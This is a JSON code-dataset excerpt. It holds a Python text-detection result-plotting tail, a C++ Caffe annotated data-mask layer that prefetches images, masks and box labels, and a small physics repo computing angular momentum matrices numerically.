int(round(top_ymax[i] * image.shape[0]))\n score = top_conf[i]\n\n xmin = max(0, int(round(top_xmin[i] * original_shape[1])))\n ymin = max(0, int(round(top_ymin[i] * original_shape[0])))\n xmax = min(original_shape[1]-1, int(round(top_xmax[i] * original_shape[1])))\n ymax = min(original_shape[0]-1, int(round(top_ymax[i] * original_shape[0])))\n coords = (xmin, ymin), xmax-xmin+1, ymax-ymin+1\n\n try:\n assert xmin <= xmax and ymin <= ymax, 'left must less than right'\n except:\n continue\n lock.acquire()\n detlist.append([xmin, ymin, xmax, ymax, score])\n lock.release()\n my_queue.task_done()\n\n for j in xrange(10):\n a = Thread(target=worker)\n a.daemon = True\n a.start()\n my_queue.join()\n\n image_name = os.path.splitext(os.path.basename(image_path))[0]\n fp = open('./examples/text/result/res_{}.txt'.format(image_name),'w')\n if len(detlist) != 0:\n dets = np.array(detlist).astype(np.float32)\n #keep = nms(dets, 0.1)\n #dets = dets[keep, :]\n for j in range(dets.shape[0]):\n xmin, ymin, xmax, ymax, score = dets[j,:]\n color = colors[1]\n display_txt = '%.2f'%(score)\n coords = (xmin, ymin), xmax-xmin+1, ymax-ymin+1\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor='green', linewidth=2))\n currentAxis.text(xmin, ymin, display_txt)\n fp.write('{},{},{},{}\\r\\n'.format(int(xmin), int(ymin), int(xmax), int(ymax)))\n\n plt.savefig('./examples/text/result/{}'.format(os.path.basename(image_path)))\n plt.close()\n fp.close()\n" }, { "alpha_fraction": 0.5909682512283325, "alphanum_fraction": 0.5970197916030884, "avg_line_length": 38.00507736206055, "blob_id": "ef1c414fa1899c36171e1d27e691d1263b041d21", "content_id": "4b6839b0bfb301a163fcdbc15d7452f122930a0a", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 15368, "license_type": "permissive", "max_line_length": 117, "num_lines": 394, "path": "/src/caffe/layers/annotated_data_mask_layer.cpp", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "#ifdef USE_OPENCV\n#include <opencv2/core/core.hpp>\n#endif // USE_OPENCV\n#include <stdint.h>\n\n#include <algorithm>\n#include <map>\n#include <vector>\n#include <iostream>\n#include \"caffe/data_transformer.hpp\"\n#include \"caffe/layers/annotated_data_mask_layer.hpp\"\n#include \"caffe/util/benchmark.hpp\"\n#include \"caffe/util/sampler.hpp\"\n\n\n\nnamespace caffe {\n\ntemplate <typename Dtype>\nAnnotatedDataMaskLayer<Dtype>::AnnotatedDataMaskLayer(const LayerParameter& 
param)\n : BaseDataMaskLayer<Dtype>(param),\n prefetch_free_(), prefetch_full_(),\n reader_(param){\n for (int i = 0; i < PREFETCH_COUNT; ++i) {\n prefetch_free_.push(&prefetch_[i]);\n }\n DLOG(INFO) << \"Constructor completed\";\n}\n\ntemplate <typename Dtype>\nAnnotatedDataMaskLayer<Dtype>::~AnnotatedDataMaskLayer() {\n this->StopInternalThread();\n}\n\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::DataLayerSetUp(\n const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {\n const int batch_size = this->layer_param_.data_param().batch_size();\n const AnnotatedDataParameter& anno_data_param =\n this->layer_param_.annotated_data_param();\n oriented_ = anno_data_param.oriented();\n for (int i = 0; i < anno_data_param.batch_sampler_size(); ++i) {\n batch_samplers_.push_back(anno_data_param.batch_sampler(i));\n }\n label_map_file_ = anno_data_param.label_map_file();\n\n // Read a data point, and use it to initialize the top blob.\n AnnotatedMaskDatum& anno_datum = *(reader_.full().peek());\n // Use data_transformer to infer the expected blob shape from anno_datum.\n vector<int> data_shape =\n this->data_transformer_->InferBlobShape(anno_datum.datum());\n this->transformed_data_.Reshape(data_shape);\n // Reshape top[0] and prefetch_data according to the batch_size.\n data_shape[0] = batch_size;\n top[0]->Reshape(data_shape);\n for (int i = 0; i < this->PREFETCH_COUNT; ++i) {\n this->prefetch_[i].data_.Reshape(data_shape);\n }\n LOG(INFO) << \"output data size: \" << top[0]->num() << \",\"\n << top[0]->channels() << \",\" << top[0]->height() << \",\"\n << top[0]->width();\n // label\n if (this->output_labels_) {\n vector<int> mask_shape =\n this->data_transformer_->InferBlobShape(anno_datum.mask());\n this->transformed_mask_.Reshape(mask_shape);\n // Reshape top[1] and prefetch_mask according to the batch_size.\n mask_shape[0] = batch_size;\n top[1]->Reshape(mask_shape);\n for (int i = 0; i < this->PREFETCH_COUNT; ++i) {\n this->prefetch_[i].mask_.Reshape(mask_shape);\n }\n LOG(INFO) << \"output mask size: \" << top[1]->num() << \",\"\n << top[1]->channels() << \",\" << top[1]->height() << \",\"\n << top[1]->width();\n has_anno_type_ = anno_datum.has_type();\n vector<int> label_shape(4, 1);\n if (has_anno_type_) {\n anno_type_ = anno_datum.type();\n // Infer the label shape from anno_datum.AnnotationGroup().\n int num_bboxes = 0;\n if (anno_type_ == AnnotatedMaskDatum_AnnotationType_BBOX) {\n // Since the number of bboxes can be different for each image,\n // we store the bbox information in a specific format. Specifically:\n // All bboxes are stored in one spatial plane (num and channels are 1)\n // And each row contains one and only one box in the following format:\n // [item_id, group_label, instance_id, xmin, ymin, xmax, ymax, diff]\n // Note: Refer to caffe.proto for details about group_label and\n // instance_id.\n for (int g = 0; g < anno_datum.annotation_group_size(); ++g) {\n num_bboxes += anno_datum.annotation_group(g).annotation_size();\n }\n label_shape[0] = 1;\n label_shape[1] = 1;\n // BasePrefetchingDataLayer<Dtype>::LayerSetUp() requires to call\n // cpu_data and gpu_data for consistent prefetch thread. 
Thus we make\n // sure there is at least one bbox.\n label_shape[2] = std::max(num_bboxes, 1);\n label_shape[3] = 8;\n if(oriented_){\n label_shape[3] = 13;\n }\n } else {\n LOG(FATAL) << \"Unknown annotation type.\";\n }\n } else {\n label_shape[0] = batch_size;\n }\n top[2]->Reshape(label_shape);\n for (int i = 0; i < this->PREFETCH_COUNT; ++i) {\n this->prefetch_[i].label_.Reshape(label_shape);\n }\n }\n}\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::LayerSetUp(\n const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {\n BaseDataMaskLayer<Dtype>::LayerSetUp(bottom, top);\n for (int i = 0; i < PREFETCH_COUNT; ++i) {\n prefetch_[i].data_.mutable_cpu_data();\n if (this->output_labels_) {\n prefetch_[i].mask_.mutable_cpu_data();\n prefetch_[i].label_.mutable_cpu_data();\n }\n }\n#ifndef CPU_ONLY\n if (Caffe::mode() == Caffe::GPU) {\n for (int i = 0; i < PREFETCH_COUNT; ++i) {\n prefetch_[i].data_.mutable_gpu_data();\n if (this->output_labels_) {\n prefetch_[i].mask_.mutable_gpu_data();\n prefetch_[i].label_.mutable_gpu_data();\n }\n }\n }\n#endif\n DLOG(INFO) << \"Initializing prefetch\";\n this->data_transformer_->InitRand();\n this->mask_transformer_->InitRand();\n StartInternalThread();\n DLOG(INFO) << \"Prefetch initialized.\";\n}\n\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::InternalThreadEntry() {\n#ifndef CPU_ONLY\n cudaStream_t stream;\n if (Caffe::mode() == Caffe::GPU) {\n CUDA_CHECK(cudaStreamCreateWithFlags(&stream, cudaStreamNonBlocking));\n }\n#endif\n try{\n while (!must_stop()) {\n BatchMask<Dtype>* batch = prefetch_free_.pop();\n load_batch(batch);\n#ifndef CPU_ONLY\n if (Caffe::mode() == Caffe::GPU) {\n batch->data_.data().get()->async_gpu_push(stream);\n CUDA_CHECK(cudaStreamSynchronize(stream));\n }\n#endif\n prefetch_full_.push(batch);\n }\n } catch (boost::thread_interrupted&) {\n // Interrupted exception is expected on shutdown\n }\n#ifndef CPU_ONLY\n if (Caffe::mode() == Caffe::GPU) {\n CUDA_CHECK(cudaStreamDestroy(stream));\n }\n#endif\n}\n\ntemplate <typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::Forward_cpu(\n const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {\n BatchMask<Dtype>* batch = prefetch_full_.pop(\"Data layer prefetch queue empty\");\n // Reshape to loaded data.\n top[0]->ReshapeLike(batch->data_);\n // Copy the data\n caffe_copy(batch->data_.count(), batch->data_.cpu_data(),\n top[0]->mutable_cpu_data());\n DLOG(INFO) << \"Prefetch copied\";\n if (this->output_labels_) {\n // Reshape to loaded labels.\n top[1]->ReshapeLike(batch->mask_);\n top[2]->ReshapeLike(batch->label_);\n // Copy the masks and labels.\n caffe_copy(batch->mask_.count(), batch->mask_.cpu_data(),\n top[1]->mutable_cpu_data());\n caffe_copy(batch->label_.count(), batch->label_.cpu_data(),\n top[2]->mutable_cpu_data());\n }\n\n prefetch_free_.push(batch);\n}\n\n// This function is called on prefetch thread\ntemplate<typename Dtype>\nvoid AnnotatedDataMaskLayer<Dtype>::load_batch(BatchMask<Dtype>* batch) {\n CPUTimer batch_timer;\n batch_timer.Start();\n double read_time = 0;\n double trans_time = 0;\n CPUTimer timer;\n CHECK(batch->data_.count());\n CHECK(this->transformed_data_.count());\n CHECK(this->transformed_mask_.count());\n\n // Reshape according to the first anno_datum of each batch\n // on single input batches allows for inputs of varying dimension.\n const int batch_size = this->layer_param_.data_param().batch_size();\n AnnotatedMaskDatum& anno_datum = *(reader_.full().peek());\n // Use 
data_transformer to infer the expected blob shape from anno_datum.\n vector<int> data_shape =\n this->data_transformer_->InferBlobShape(anno_datum.datum());\n this->transformed_data_.Reshape(data_shape);\n // Reshape batch according to the batch_size.\n data_shape[0] = batch_size;\n batch->data_.Reshape(data_shape);\n Dtype* top_data = batch->data_.mutable_cpu_data();\n Dtype* mask_data = NULL;\n Dtype* top_label = NULL; // suppress warnings about uninitialized variables\n if (this->output_labels_) {\n vector<int> mask_shape =\n this->mask_transformer_->InferBlobShape(anno_datum.mask());\n this->transformed_mask_.Reshape(mask_shape);\n mask_shape[0] = batch_size;\n batch->mask_.Reshape(mask_shape);\n mask_data = batch->mask_.mutable_cpu_data();\n }\n if (this->output_labels_ && !has_anno_type_) {\n top_label = batch->label_.mutable_cpu_data();\n }\n\n // Store transformed annotation.\n map<int, vector<AnnotationGroup> > all_anno;\n int num_bboxes = 0;\n\n for (int item_id = 0; item_id < batch_size; ++item_id) {\n timer.Start();\n // get a anno_datum\n AnnotatedMaskDatum& temp_anno_datum = *(reader_.full().pop(\"Waiting for data\"));\n AnnotatedMaskDatum anno_datum(temp_anno_datum);\n this->data_transformer_->DistortImage(temp_anno_datum.datum(),\n anno_datum.mutable_datum());\n read_time += timer.MicroSeconds();\n timer.Start();\n AnnotatedMaskDatum sampled_datum;\n if (batch_samplers_.size() > 0) {\n // Generate sampled bboxes from anno_datum.\n vector<NormalizedBBox> sampled_bboxes;\n GenerateBatchSamples(anno_datum, batch_samplers_, &sampled_bboxes);\n if (sampled_bboxes.size() > 0) {\n // Randomly pick a sampled bbox and crop the anno_datum.\n int rand_idx = caffe_rng_rand() % sampled_bboxes.size();\n this->data_transformer_->CropImage(anno_datum, sampled_bboxes[rand_idx],\n &sampled_datum, false);\n this->mask_transformer_->CropImage(anno_datum, sampled_bboxes[rand_idx],\n &sampled_datum, true);\n } else {\n sampled_datum.CopyFrom(anno_datum);\n }\n } else {\n sampled_datum.CopyFrom(anno_datum);\n }\n // Apply data transformations (mirror, scale, crop...)\n int offset = batch->data_.offset(item_id);\n this->transformed_data_.set_cpu_data(top_data + offset);\n vector<AnnotationGroup> transformed_anno_vec;\n if (this->output_labels_) {\n int offset_mask = batch->mask_.offset(item_id);\n this->transformed_mask_.set_cpu_data(mask_data + offset_mask);\n if (has_anno_type_) {\n // Make sure all data have same annotation type.\n CHECK(sampled_datum.has_type()) << \"Some datum misses AnnotationType.\";\n CHECK_EQ(anno_type_, sampled_datum.type()) <<\n \"Different AnnotationType.\";\n // Keep same mirror\n this->data_transformer_->setForceMirrorFlag(true);\n this->mask_transformer_->setForceMirrorFlag(true);\n bool do_mirror = this->data_transformer_->getMirror();\n this->data_transformer_->setMirror(do_mirror);\n this->mask_transformer_->setMirror(do_mirror);\n transformed_anno_vec.clear();\n this->data_transformer_->Transform(sampled_datum,\n &(this->transformed_data_),\n &transformed_anno_vec, false);\n transformed_anno_vec.clear();\n this->mask_transformer_->Transform(sampled_datum,\n &(this->transformed_mask_),\n &transformed_anno_vec, true);\n // vector<int> shape2 =\n // this->data_transformer_->InferBlobShape(sampled_datum.mask());\n //std::cout << \"mask \" << shape2[0] << \" \" << shape2[1] << \" \" << shape2[2] << \" \" << shape2[3] << std::endl;\n if (anno_type_ == AnnotatedMaskDatum_AnnotationType_BBOX) {\n // Count the number of bboxes.\n for (int g = 0; g < 
transformed_anno_vec.size(); ++g) {\n num_bboxes += transformed_anno_vec[g].annotation_size();\n }\n } else {\n LOG(FATAL) << \"Unknown annotation type.\";\n }\n all_anno[item_id] = transformed_anno_vec;\n } else {\n this->data_transformer_->Transform(sampled_datum.datum(),\n &(this->transformed_data_));\n // Otherwise, store the label from datum.\n CHECK(sampled_datum.datum().has_label()) << \"Cannot find any label.\";\n top_label[item_id] = sampled_datum.datum().label();\n }\n } else {\n this->data_transformer_->Transform(sampled_datum.datum(),\n &(this->transformed_data_));\n }\n trans_time += timer.MicroSeconds();\n\n reader_.free().push(const_cast<AnnotatedMaskDatum*>(&temp_anno_datum));\n }\n // Store \"rich\" annotation if needed.\n int shape_annotation = 8;\n if(oriented_){\n shape_annotation = 13;\n }\n if (this->output_labels_ && has_anno_type_) {\n vector<int> label_shape(4);\n if (anno_type_ == AnnotatedMaskDatum_AnnotationType_BBOX) {\n label_shape[0] = 1;\n label_shape[1] = 1;\n label_shape[3] = shape_annotation;\n if (num_bboxes == 0) {\n // Store all -1 in the label.\n label_shape[2] = 1;\n batch->label_.Reshape(label_shape);\n caffe_set<Dtype>(shape_annotation, -1, batch->label_.mutable_cpu_data());\n } else {\n // Reshape the label and store the annotation.\n label_shape[2] = num_bboxes;\n batch->label_.Reshape(label_shape);\n top_label = batch->label_.mutable_cpu_data();\n int idx = 0;\n for (int item_id = 0; item_id < batch_size; ++item_id) {\n const vector<AnnotationGroup>& anno_vec = all_anno[item_id];\n for (int g = 0; g < anno_vec.size(); ++g) {\n const AnnotationGroup& anno_group = anno_vec[g];\n for (int a = 0; a < anno_group.annotation_size(); ++a) {\n const Annotation& anno = anno_group.annotation(a);\n const NormalizedBBox& bbox = anno.bbox();\n top_label[idx++] = item_id;\n top_label[idx++] = anno_group.group_label();\n top_label[idx++] = anno.instance_id();\n top_label[idx++] = bbox.xmin();\n top_label[idx++] = bbox.ymin();\n top_label[idx++] = bbox.xmax();\n top_label[idx++] = bbox.ymax();\n top_label[idx++] = bbox.difficult();\n if(shape_annotation == 13){\n const NormalizedOrientedBBox& oriented_bbox = anno.oriented_bbox();\n top_label[idx++] = oriented_bbox.xc();\n top_label[idx++] = oriented_bbox.yc();\n top_label[idx++] = oriented_bbox.width();\n top_label[idx++] = oriented_bbox.height();\n top_label[idx++] = oriented_bbox.radians();\n // std::cout << oriented_bbox.xc() << \" \"\n // << oriented_bbox.yc() << \" \"\n // << oriented_bbox.width() << \" \"\n // << oriented_bbox.height() << \" \"\n // << oriented_bbox.radians() << \"\"\n // << std::endl;\n }\n }\n }\n }\n }\n } else {\n LOG(FATAL) << \"Unknown annotation type.\";\n }\n }\n timer.Stop();\n batch_timer.Stop();\n DLOG(INFO) << \"Prefetch batch: \" << batch_timer.MilliSeconds() << \" ms.\";\n DLOG(INFO) << \" Read time: \" << read_time / 1000 << \" ms.\";\n DLOG(INFO) << \"Transform time: \" << trans_time / 1000 << \" ms.\";\n\n}\n\n#ifdef CPU_ONLY\nSTUB_GPU_FORWARD(AnnotatedDataMaskLayer, Forward);\n#endif\n\nINSTANTIATE_CLASS(AnnotatedDataMaskLayer);\nREGISTER_LAYER_CLASS(AnnotatedDataMask);\n\n} // namespace caffe\n" } ]
4
zhang19960128/qmhwangularmomentum
https://github.com/zhang19960128/qmhwangularmomentum
0a4814268a2204e74c61ca3bb0054635fe1db4e9
4fd1b82d4f9bc33c0b286ab1bcd0bc0563c2344a
3e577a8d7987ee3969922585bf0a855789b8b39d
refs/heads/master
2021-08-14T20:10:31.959425
2017-11-16T17:18:42
2017-11-16T17:18:42
111,000,191
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8382353186607361, "alphanum_fraction": 0.8382353186607361, "avg_line_length": 67, "blob_id": "9978863a1f6673ae6f4eaa32af4d546373505457", "content_id": "2af8a6be350f12a90b12d0f4bee1ac9cdef3b6de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 68, "license_type": "no_license", "max_line_length": 67, "num_lines": 1, "path": "/README.md", "repo_name": "zhang19960128/qmhwangularmomentum", "src_encoding": "UTF-8", "text": "this is the numerical code and analytical code for angular momentum\n" }, { "alpha_fraction": 0.5548844337463379, "alphanum_fraction": 0.595588207244873, "avg_line_length": 34.588783264160156, "blob_id": "ef6d5b4503908acaf3ee6481f9081544a87f0724", "content_id": "c1bc1a6d9870cb66a8ee53ed08c7ef527aff9254", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3808, "license_type": "no_license", "max_line_length": 101, "num_lines": 107, "path": "/test.py", "repo_name": "zhang19960128/qmhwangularmomentum", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 11 07:45:58 2017\n\n@author: jiahaozhang\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport cmath\ndef dis(x,y,z):\n return math.sqrt(x**2+y**2+z**2);\ndef px(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n for i in range(0,ngrid-1,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=1/cmath.sqrt(-1)*(phi[i+1,j,k]-phi[i,j,k])/dx;\n return re;\ndef py(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n for i in range(0,ngrid,1):\n for j in range(0,ngrid-1,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=1/cmath.sqrt(-1)*(phi[i,j+1,k]-phi[i,j,k])/dy;\n return re;\ndef pz(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid-1,1):\n re[i,j,k]=1/cmath.sqrt(-1)*(phi[i,j,k+1]-phi[i,j,k])/dy;\n return re;\ndef xop(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n xscope=np.linspace(-1*scope,scope,ngrid);\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=xscope[i]*phi[i,j,k];\n return re;\ndef yop(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n yscope=np.linspace(-1*scope,scope,ngrid);\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=yscope[j]*phi[i,j,k];\n return re;\ndef zop(phi):\n re=np.zeros((ngrid,ngrid,ngrid),dtype='complex');\n zscope=np.linspace(-1*scope,scope,ngrid);\n for i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n re[i,j,k]=zscope[k]*phi[i,j,k];\n return re;\ndef innerprod(phi1,phi2):\n return np.vdot(np.conjugate(phi1.reshape((ngrid**3,1,1))),phi2.reshape((ngrid**3,1,1)))*dx*dy*dz;\nngrid=500;\nscope=5;\nxgrid=np.linspace(-1*scope,scope,ngrid);\ndx=xgrid[2]-xgrid[1];\nygrid=np.linspace(-1*scope,scope,ngrid);\ndy=ygrid[2]-ygrid[1];\nzgrid=np.linspace(-1*scope,scope,ngrid);\ndz=zgrid[2]-zgrid[1];\nphiall=np.zeros((4,ngrid,ngrid,ngrid),dtype='complex');\nfor i in range(0,ngrid,1):\n for j in range(0,ngrid,1):\n for k in range(0,ngrid,1):\n phiall[0,i,j,k]=math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2);\n phiall[1,i,j,k]=xgrid[i]*math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2);\n 
phiall[2,i,j,k]=ygrid[j]*math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2); \n phiall[3,i,j,k]=zgrid[k]*math.exp(-1*dis(xgrid[i],ygrid[j],zgrid[k])/2); \nco1=math.sqrt(1/np.sum(np.power(np.reshape(phiall[0],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nco2=math.sqrt(1/np.sum(np.power(np.reshape(phiall[1],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nco3=math.sqrt(1/np.sum(np.power(np.reshape(phiall[2],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nco4=math.sqrt(1/np.sum(np.power(np.reshape(phiall[3],(ngrid*ngrid*ngrid,1,1)),2)*dx*dy*dz));\nphiall[0]=co1*phiall[0];\nphiall[1]=co2*phiall[1];\nphiall[2]=co3*phiall[2];\nphiall[3]=co4*phiall[3];\nlz=np.zeros((4,4),dtype='complex');\nlx=np.zeros((4,4),dtype='complex');\nly=np.zeros((4,4),dtype='complex');\nfor i in range(4):\n for j in range(4):\n print(\"get one\")\n lz[i,j]=innerprod(phiall[i],xop(py(phiall[j]))-yop(px(phiall[j])));\n lx[i,j]=innerprod(phiall[i],yop(pz(phiall[j]))-zop(py(phiall[j])));\n ly[i,j]=innerprod(phiall[i],zop(px(phiall[j]))-xop(pz(phiall[j])));\ndata_file=open(\"re.txt\",\"a\");\n# file.write() only accepts strings, so the numpy matrices must be converted first\ndata_file.write(str(lx));\ndata_file.write(\"\\n\");\ndata_file.write(str(ly));\ndata_file.write(\"\\n\");\ndata_file.write(str(lz));\ndata_file.close();\n" } ]
2
vedant-kakde/Py-Projects
https://github.com/vedant-kakde/Py-Projects
54537158fed196f83e0fc343474c3548f117f33c
9abda3511228d564fe21e6f749f094fa279344e5
1a9f783a5a7789aa7d0ab2d398fdf3d80329b6bf
refs/heads/main
2023-07-02T02:51:00.211441
2021-07-24T17:09:18
2021-07-24T17:09:18
386,736,545
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7006109952926636, "alphanum_fraction": 0.7087576389312744, "avg_line_length": 17.923076629638672, "blob_id": "04c8c9881e914298ba8ad3675a94c25e0afe48dd", "content_id": "762b7e5b5f9347387f2a6693a0f028ea7ce9b520", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 491, "license_type": "no_license", "max_line_length": 79, "num_lines": 26, "path": "/1-word counter/word-counter.py", "repo_name": "vedant-kakde/Py-Projects", "src_encoding": "UTF-8", "text": "# WORD COUNTER\n\n# We want a program which can count the words from each text file automatically\n\n# First we need a sample text file\n!wget https://filesamples.com/samples/document/txt/sample1.txt\n\n# Opening a file using read mode\nf = open(\"/content/sample1.txt\", \"r\")\n\n# Empty List\nc=[]\n\n# Splitting all the words inside the text file and appending it to the list\nfor x in f:\n print(x)\n c.append(x.split(' '))\nc\n\n# Count of words inside the list c\nd=0\nfor i in range(len(c)):\n d=d+1\nd\n\nlen(c)" }, { "alpha_fraction": 0.7115384340286255, "alphanum_fraction": 0.75, "avg_line_length": 16.33333396911621, "blob_id": "d2eb8ea90b549d50ba8470c9d5cc31b151f6c774", "content_id": "8c7126507898d5c657859fb57992175d9ac744ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 21, "num_lines": 3, "path": "/README.md", "repo_name": "vedant-kakde/Py-Projects", "src_encoding": "UTF-8", "text": "# Py-Projects\n1. Word counter\n2. Word Guessing Game\n" }, { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.6645962595939636, "avg_line_length": 20.078947067260742, "blob_id": "4d436bb647e0dc37cbc4232d962a7010799f49c6", "content_id": "51d05833e242527ca63b1f6a622c3c5131b11140", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 805, "license_type": "no_license", "max_line_length": 71, "num_lines": 38, "path": "/2-word guessing game/word-guessing-game.py", "repo_name": "vedant-kakde/Py-Projects", "src_encoding": "UTF-8", "text": "import random\n\nwords=['facebook', 'amazon', 'apple', 'microsoft', 'netflix', 'google']\n\n#choose random words from the list\nguessed_word = random.choice(words)\nguessed_word\n\nhint=guessed_word[0]+guessed_word[-1]\nhint\n\nstore_g_l=[]\ntry_p=6\na=input('Enter Your Name')\nprint('Welcome to the Game world', a)\nprint('You have 6 attempts to guess the word.')\n\nfor guess in range(try_p):\n while True:\n letter = input('Guess the letter')\n\n if len(letter) == 1:\n break\n else:\n print(\"Oops! Please guess a letter\")\n\n if letter in guessed_word:\n print('yes!')\n store_g_l.append(letter)\n else:\n print('no!')\n\n if guess == 3:\n print()\n clue_request = input('Would you like a clue?')\n if clue_request.lower().startswith('y'):\n print()\n print('CLUE: The first and last letter of the word is: ', hint)\n \n" } ]
3
Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist
https://github.com/Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist
b050c57e1f8dbd748a2abd5eb242777242f593cc
b4b264e0fc89154ce02a6db5031ec1c83c27d026
84d27639c4ec73a7c78e2a5c7f65f482515f2883
refs/heads/master
2023-05-29T11:22:35.362279
2019-08-26T04:07:33
2019-08-26T04:07:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6636260151863098, "alphanum_fraction": 0.6870011687278748, "avg_line_length": 42.875, "blob_id": "57c548ac867c5f29c29fe10914db9df7793e6ad9", "content_id": "d3ec31a6a0d72e9a8d064426d3a5a00cd36c6d65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1754, "license_type": "no_license", "max_line_length": 112, "num_lines": 40, "path": "/chapter7/transformer-xl.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "### First, tokenize the input\n#############################\nimport torch\ntokenizer = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'transformerXLTokenizer', 'transfo-xl-wt103')\n\n# Prepare tokenized input\ntext_1 = \"Who was Jim Henson ?\"\ntext_2 = \"Jim Henson was a puppeteer\"\ntokenized_text_1 = tokenizer.tokenize(text_1)\ntokenized_text_2 = tokenizer.tokenize(text_2)\nindexed_tokens_1 = tokenizer.convert_tokens_to_ids(tokenized_text_1)\nindexed_tokens_2 = tokenizer.convert_tokens_to_ids(tokenized_text_2)\ntokens_tensor_1 = torch.tensor([indexed_tokens_1])\ntokens_tensor_2 = torch.tensor([indexed_tokens_2])\n\n### Get the hidden states computed by `transformerXLModel`\n##########################################################\nmodel = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'transformerXLModel', 'transfo-xl-wt103')\nmodel.eval()\n\n# Predict hidden states features for each layer\n# past can be used to reuse precomputed hidden state in a subsequent predictions\nwith torch.no_grad():\n hidden_states_1, mems_1 = model(tokens_tensor_1)\n hidden_states_2, mems_2 = model(tokens_tensor_2, mems=mems_1)\n\n### Predict the next token using `transformerXLLMHeadModel`\n###########################################################\nlm_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'transformerXLLMHeadModel', 'transfo-xl-wt103')\nlm_model.eval()\n\n# Predict hidden states features for each layer\nwith torch.no_grad():\n predictions_1, mems_1 = lm_model(tokens_tensor_1)\n predictions_2, mems_2 = lm_model(tokens_tensor_2, mems=mems_1)\n\n# Get the predicted last token\npredicted_index = torch.argmax(predictions_2[0, -1, :]).item()\npredicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]\nassert predicted_token == 'who'" }, { "alpha_fraction": 0.6356225609779358, "alphanum_fraction": 0.6464234590530396, "avg_line_length": 31.039215087890625, "blob_id": "8ed35d774aafb70f890412b9eea62868de2f91bf", "content_id": "f036559f2276081a815b0ed97b3f5918f5d580e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5537, "license_type": "no_license", "max_line_length": 106, "num_lines": 153, "path": "/chapter9/fastai_bert_classification.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom typing import *\nimport torch\nimport torch.optim as optim\nfrom fastai import *\nfrom fastai.vision import *\nfrom fastai.text import *\nfrom fastai.callbacks import *\nimport torchsnooper\n\n\n\n\nclass Config(dict):\n \"\"\"\n 定义Config类,便于参数配置与更改\n 继承自dict字典\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n for k, v in kwargs.items():\n setattr(self, k, v)\n def set(self, key, val):\n self[key] = val\n setattr(self, key, val)\n \nconfig = Config(\n testing = False,\n bert_model_name=\"bert-base-chinese\", \n 
